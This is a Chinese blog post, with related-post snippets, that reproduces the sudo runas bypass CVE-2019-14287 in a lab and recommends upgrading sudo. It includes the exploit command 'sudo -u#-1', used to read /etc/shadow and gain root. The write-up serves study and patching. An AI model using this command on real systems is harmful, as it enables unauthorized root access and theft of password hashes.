CVE-2019-14287:sudo权限绕过漏洞

最新推荐文章于 2022-08-15 17:55:53 发布
最新推荐文章于 2022-08-15 17:55:53 发布
阅读量241 收藏
点赞数
文章标签: CVE-2019-14287 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_97_97/article/details/102620450
版权

实验环境
Kali
影响范围
sudo 1.8.28之前的所有版本
复现过程
首先看一下自身Kali的sudo版本,命令:sudo -V
在这里插入图片描述
符合条件,接下来需要新建一个test用户,命令:useradd test passwd test
然后vi进入sudoers,命令:vi /etc/sudoers
在root ALL=(ALL:ALL) ALL下添加test用户的配置:test ALL=(ALL.!root) ALL
然后:!wq强制保存退出
在这里插入图片描述
test 指的是test用户
第一个ALL表示用户可以在任何地方使用sudo
第二个(ALL,!root)表示命令可以被除了root以外的任何用户执行
最后一个ALL表示被允许执行
接着用test用户登录,命令:su test
在这里插入图片描述尝试一下是否读取shadow文件,命令:cat /etc/shadow
系统提示权限不够
在这里插入图片描述
然后使用命令:sudo -u#-1 cat/etc/shadow
读取成功。在这里插入图片描述
修复建议
更新sudo版本至1.8.28以上

老头儿给钱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux sudo root 权限绕过漏洞(CVE-2019-14287)
Sylon的博客
10-15 3640
0x01 逛圈子社区论坛 看到了 linux sudo root 权限绕过漏洞(CVE-2019-14287) 跟着复现下 综合来说 这个漏洞作用不大 需要以下几个前提条件 1.知道当前普通用户的密码 2.当前普通用户在souduers文件中 3.本地提权需要本地操作 估计远程ssh连接的终端会失败 0x02 此漏洞可以使受限制的用户运行root命令 1.8.28之前的...
CVE-2019-14287sudo 权限绕过漏洞复现过程)
大方子
10-16 678
实验环境: kali 影响范围: sudo 1.8.28 之前的所有版本 复现过程 查询下sudo的版本 sudo -V 创建用户 useradd test passwd test 编辑下sudoers文件 这里添加了 test ALL=(ALL, !root) /usr/bin/vim 这里表示 test 可以 任意主机上...
CVE-2019-14287:sudo 权限绕过漏洞复现
weixin_44215027的博客
10-18 310
CVE-2019-14287:sudo 权限绕过漏洞复现 参考:Ms08067安全实验室 实验环境 kali win10 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先,检查sudo的版本: 之后创建一个新用户: useradd test passwd test 然后,切换用户为test su test 在/etc/sudoers中插入 之后就可以通过vim来进行权限绕过。...
升级sudo版本至1.9.2,解决Sudo权限绕过漏洞(CVE-2019-14287)
天道酬勤
09-16 3089
1. 环境 系统:Centos7 sudo:1.8.23(使用 sudo -V) 目标sudo:1.9.2 2. 准备 查看本地sudo版本 sudo -V [root@root1 data]# sudo -V Sudo version 1.8.23 官网查看最新版本文件 https://www.sudo.ws/dist/ 3.下载最新版本到服务器并解压 wget https://www.sudo.ws/dist/sudo-1.9.2.tar.gz && tar -zx
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
CVE-2019-18634 感谢Apple Information Security的Joe Vennix查找错误。
CVE-2019-12814:CVE-2019-12814
05-26
CVE-2019-12814 CVE-2019-12814:杰克逊JDOM XSLTransformer小工具
sudo权限绕过漏洞复现CVE-2019-14287
锋刃科技的博客
06-25 841
前言 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户能够切换的用户权限 CVE-2019-14287是管理员在配置文件中用了ALL关键词后造成的。 影响版本 sudo < 1.8.28 利用条件 1、sudo -v < 1.8.28 2、知道当前用户的密码 3、当前用户存在于sudo权限列表 我们来看一下/etc/sudoers 漏洞复现 sudo -u#-...
linux 漏洞 网站,linux sudo root 权限绕过漏洞(CVE-2019-14287)
weixin_39630498的博客
05-14 225
漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止使用的...
CVE-2019-14287sudo 权限绕过漏洞复现
shy的博客
10-17 237
Linux sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。 使用权限:在 /etc/sudoers 中有出现的使用者。 1.新建用户adduser shy 2.更改密码passwd shy 3.修改/etc/sodoers/文件,由于sudoers文件只有只读权限,不能修改,所以要先赋予它写权限 4.修改/et...
CVE-2019-14287 sudo权限绕过漏洞复现
春日野穹
10-24 1902
0x1 引言 近日 ,sudo 被爆光一个漏洞,非授权的特权用户可以绕过限制获得特权,也就是说如果将sudo配置为允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令的话,那么攻击者将有可能通过制定用户ID -1或4294967295来以root权限执行恶意命令,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。官方的修复公告请见:https://www...
CVE-2019-14287 linux sudo root 权限绕过漏洞复现
weixin_42433054的博客
10-16 1235
CVE-2019-14287 linux sudo root 权限绕过漏洞复现 1、准备工具,kali linux,或者任何版本的linux,查看sudo版本 root@kali:~# sudo -V Sudo version 1.8.21p2 明显该版本低于1.8.28。可以进行漏洞利用。 2、创建test用户,并分配密码 root@kali:/etc# useradd test ...
CVE-2019-14287sudo 权限提升漏洞
冠霖L的博客
11-02 579
0x00 漏洞介绍 sudo本地权限提升漏洞CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令 0x01 影响版本 sudo < 1.8.28 0x02 sudo作用 sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性 0x03 ...
四、Linux sudo root 权限绕过漏洞(CVE-2019-14287)
qwsn
10-16 1984
一、漏洞分析: 1.该漏洞2019年10月14日,被Sudo官方发布 2.该漏洞的用处:使受限制的sudo权限用户,可不受限制运行root命令 二、漏洞复现: 1.漏洞的环境: 漏洞的影响 漏洞的使用前提 sudo的版本低于1.8.28 一个用户可以执行sudo命令,但是会被限制 2.漏洞的环境复现: ①输入以下命令,查看当前sudo 的版本; 进入root用户:su...
sudo漏洞
Arvin627的博客
08-15 2145
Sudo本地权限提升漏洞(CVE-2017-1000367) Sudo权限绕过漏洞(CVE-2019-14287)
sudo相关漏洞CVE-2019-18634、CVE-2019-14287
悦分享
08-07 677
实际上,只要用户的权限足够高,即拥有最高sudo权限的用户,并且在Runas规范中定义了ALL关键字的话,他们就可以运行Runas规范中明确禁止使用的那些root命令,而且以这种方式运行的命令其日志项所显示的目标用户为4294967295,而不是root。但是,sudo日志条目中记录下的命令运行用户的ID为“4294967295”,而并非root用户(或用户ID为“0”),除此之外,因为用户ID是通过-u选项指定的,并且不会在密码数据库中存储,所以PAM会话模块也不会运行。上述命令运行之后,将返回“0”。.
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
最新发布
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值